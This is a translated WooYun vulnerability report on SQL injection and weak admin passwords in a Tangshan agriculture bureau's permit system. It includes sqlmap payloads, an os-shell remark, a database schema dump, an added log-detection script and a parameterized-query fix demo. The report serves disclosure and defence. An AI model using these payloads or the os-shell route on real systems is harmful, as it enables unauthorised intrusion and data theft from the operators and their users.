
Vulnerability summary

Defect ID: wooyun-2015-0140881

Title: High-risk SQL injection in a system of a Tangshan municipal bureau, plus weak passwords across multiple departments, leading to back-end compromise

Affected vendor: 唐山市农牧局 (Tangshan Municipal Bureau of Agriculture and Animal Husbandry)

Author: 岛云首席鉴黄师

Submitted: 2015-09-15 14:40

Fixed: 2015-11-01 15:56

Published: 2015-11-01 15:56

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-09-15: Details sent to the vendor; awaiting the vendor's handling
2015-09-17: CNCERT (National Internet Emergency Center) has not yet been able to reach the affected organisation; details disclosed only to the reporting agency
2015-09-27: Details disclosed to core white hats and domain experts
2015-10-07: Details disclosed to regular white hats
2015-10-17: Details disclosed to intern white hats
2015-11-01: Details disclosed to the public

Summary:

Company: My ICP filing won't get approved, what do I do? Black hat: 2000 yuan, guaranteed to pass.

Details:

Tangshan Municipal Bureau of Agriculture and Animal Husbandry, agricultural input product admission system (农业投入品准入系统)

http://**.**.**.**/ApplicationSearch.aspx?type=1


The database user has SA privileges, so --os-shell is available as well~

---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=1 AND 5994=5994
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: type=1 AND 5104=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5104=5104) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)))
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: type=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4677=4677) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: type=1 OR 3921=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
sqlmap resumed the following injection point(s) from stored session:
---
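The four sqlmap techniques listed above (boolean-based blind, error-based via CONVERT(INT, ...), CHAR() string building, and the sysusers heavy-query time-based check) each leave a recognisable trace in the web server's access log. The following Python detector is an added example, not part of the original report or of the affected system: it parses constructed IIS W3C log lines (the IPs, timestamps and user agents are made up) and flags requests whose URL-decoded query string matches one of those patterns, which is what a defender reviewing logs for this `ApplicationSearch.aspx?type=` endpoint would look for.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C access-log sample (not taken from the report).
# The payload shapes mirror the sqlmap output above; everything else is invented.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2015-09-15 06:40:01 10.0.0.5 GET /ApplicationSearch.aspx type=1 80 - 203.0.113.9 Mozilla/5.0 200
2015-09-15 06:40:02 10.0.0.5 GET /ApplicationSearch.aspx type=1+AND+5994%3D5994 80 - 203.0.113.9 sqlmap/1.0 200
2015-09-15 06:40:03 10.0.0.5 GET /ApplicationSearch.aspx type=1+AND+5104%3DCONVERT%28INT%2C%28SELECT+CHAR%28113%29%2BCHAR%28107%29%29%29 80 - 203.0.113.9 sqlmap/1.0 500
2015-09-15 06:40:04 10.0.0.5 GET /ApplicationSearch.aspx type=1+OR+3921%3D%28SELECT+COUNT%28%2A%29+FROM+sysusers+AS+sys1%2Csysusers+AS+sys2%29 80 - 203.0.113.9 sqlmap/1.0 200
2015-09-15 06:41:10 10.0.0.5 GET /ApplicationSearch.aspx type=2 80 - 198.51.100.7 Mozilla/5.0 200
"""

# One signature per technique shown in the sqlmap output.
SIGNATURES = {
    # "type=1 AND 5994=5994": tautology / contradiction pairs used for blind inference
    "boolean-blind": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),
    # CONVERT(INT, <string>) forces a conversion error that leaks data in the message
    "mssql-error-based": re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    # CHAR(n)+CHAR(n)+... builds marker strings without quote characters
    "char-concat": re.compile(r"CHAR\s*\(\s*\d+\s*\)(?:\s*\+\s*CHAR\s*\(\s*\d+\s*\))+", re.I),
    # self-joined sysusers COUNT(*) is the MSSQL "heavy query" time-based probe
    "mssql-heavy-query": re.compile(r"COUNT\s*\(\s*\*\s*\)\s+FROM\s+sysusers", re.I),
}


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed record; a real collector would count these separately
        yield dict(zip(fields, parts))


def classify(query):
    """Return the set of signature names that match the URL-decoded query string."""
    decoded = unquote_plus(query)  # '+' -> space, %3D -> '=', %28 -> '(' ...
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}


def find_injection_attempts(text):
    """Return (client_ip, uri_stem, raw_query, sorted signature names) for each flagged record."""
    hits = []
    for rec in parse_w3c(text):
        matched = classify(rec["cs-uri-query"])
        if matched:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], rec["cs-uri-query"], sorted(matched)))
    return hits


if __name__ == "__main__":
    for ip, stem, query, sigs in find_injection_attempts(SAMPLE_LOG):
        print(f"{ip} {stem}?{query} -> {', '.join(sigs)}")
```

Signature matching on decoded query strings catches the noisy, automated phase seen in this report; it will not catch every hand-crafted payload, so treat a hit as a trigger to pull the full request history for that client and that parameter rather than as the only control.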


Tables:

---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: TSAA_Application1
[60 tables]
+-------------------------------+
| Application |
| ApplicationStatus |
| Area |
| BusinessField |
| Company |
| CompanyBusinessField |
| CompanyStatus |
| CompanyType |
| Education |
| Log |
| MarketPermission |
| ProcessDocument |
| Producer |
| Product |
| ProductStatus |
| ProductionDocument |
| QualityAssurance |
| QualityTest |
| cms_advs_advscontent |
| cms_advs_advscustomers |
| cms_advs_advshits |
| cms_content_1 |
| cms_content_2 |
| cms_content_3 |
| cms_content_4 |
| cms_content_5 |
| cms_content_6 |
| cms_content_Content |
| cms_content_ContentUpFile |
| cms_log_ContentClickLog |
| cms_model_FormInputLimitType |
| cms_model_FormInputType |
| cms_model_FormInputValue |
| cms_model_FormInputValueType |
| cms_model_Model |
| cms_model_ModelField |
| cms_node_ContentPubType |
| cms_node_Node |
| cms_node_NodeAddionalPub |
| cms_node_NodeContentSort |
| cms_node_NodeGroup |
| cms_node_NodeType |
| cms_oper_log |
| cms_pub_pubTask |
| cms_rec_Recom |
| cms_rec_RecomContent |
| cms_rec_RecomTemplate |
| cms_sys_ContentWorkFlow |
| cms_sys_Log |
| cms_sys_PSN |
| cms_sys_ParamType |
| cms_sys_TimeZone |
| cms_sys_WordReplace |
| cms_user_AdminUsers |
| cms_user_UserBase |
| cms_user_UserPermission |
| cms_vwAllBaseInfo |
| cms_vwCommendAllInfo |
| cms_vwContentBaseInfoForClick |
| cms_vwContentClickLog |
+-------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---


Admin table:

Table: cms_user_AdminUsers
[10 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| AddTime | datetime |
| LastLogTime | datetime |
| LogName | nvarchar |
| LogPWD | varchar |
| Name | nvarchar |
| NodeIds | nvarchar |
| PermissionIds | varchar |
| PubCount | int |
| Sex | bit |
| UserBaseId | int |
+---------------+----------+


The dumped data

[screenshot: 8.jpg]


All weak passwords......
Log into the back end with an admin account to prove it

[screenshot: 9.jpg]

Proof of vulnerability:

[screenshot: 9.jpg]

Fix recommendations:

Filter input + stop using weak passwords + hide the admin back end + minimise database privileges
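"Filter input" is the weakest way to state the first fix: the reliable form is to keep the `type` parameter out of the SQL text entirely by binding it as a parameter, with an allow-list check in front. The following Python example is added here and is not code from the report or from the affected ASP.NET application; it uses an in-memory SQLite table as a stand-in for the `Application` table in SQL Server (assumed schema, constructed rows) to show how the boolean-blind probe from the sqlmap output behaves against concatenated SQL versus a bound parameter.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the report's Application table (SQLite, not SQL Server)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Application (id INTEGER PRIMARY KEY, type INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO Application (type, title) VALUES (?, ?)",
        [(1, "feed additive permit"), (1, "seed permit"), (2, "pesticide permit")],
    )
    conn.commit()
    return conn


def search_vulnerable(conn, type_param):
    """String concatenation: the request parameter becomes part of the SQL text.

    'type=1 AND 5994=5994' returns rows and 'type=1 AND 5994=5995' returns none,
    which is exactly the true/false oracle sqlmap's boolean-based blind technique needs.
    """
    sql = "SELECT id, title FROM Application WHERE type = " + type_param
    return conn.execute(sql).fetchall()


def search_parameterized(conn, type_param):
    """Bound parameter: the whole value is compared as data and never parsed as SQL."""
    return conn.execute(
        "SELECT id, title FROM Application WHERE type = ?", (type_param,)
    ).fetchall()


def search_validated(conn, type_param):
    """Allow-list validation in front of the bound parameter.

    The endpoint only ever needs a small positive integer, so anything else is
    rejected before it reaches the database (defence in depth, not a replacement
    for the parameter binding).
    """
    if not (isinstance(type_param, str) and type_param.isdigit() and len(type_param) <= 6):
        raise ValueError("type must be a short positive integer")
    return search_parameterized(conn, int(type_param))


if __name__ == "__main__":
    db = make_db()
    print("concatenated, true  probe:", search_vulnerable(db, "1 AND 5994=5994"))
    print("concatenated, false probe:", search_vulnerable(db, "1 AND 5994=5995"))
    print("bound parameter,    probe:", search_parameterized(db, "1 AND 5994=5994"))
    print("validated, normal request:", search_validated(db, "1"))
```

In ADO.NET the equivalent of the bound form is `SqlCommand` with `SqlParameter` values rather than string concatenation; a stored procedure called with parameters works the same way. The last item of the fix list matters just as much: the report shows the application connecting as `sa`, and a dedicated login with only SELECT/INSERT/UPDATE rights on the application's own tables would keep an injection from turning into the `--os-shell` the author mentions.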

Copyright notice: please credit the source when reposting: 岛云首席鉴黄师@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-09-17 15:55

Vendor reply:

CNVD has confirmed and reproduced the described issue; it has been forwarded via CNCERT to the Hebei branch, which will coordinate handling with the website's managing unit.

Latest status:

None yet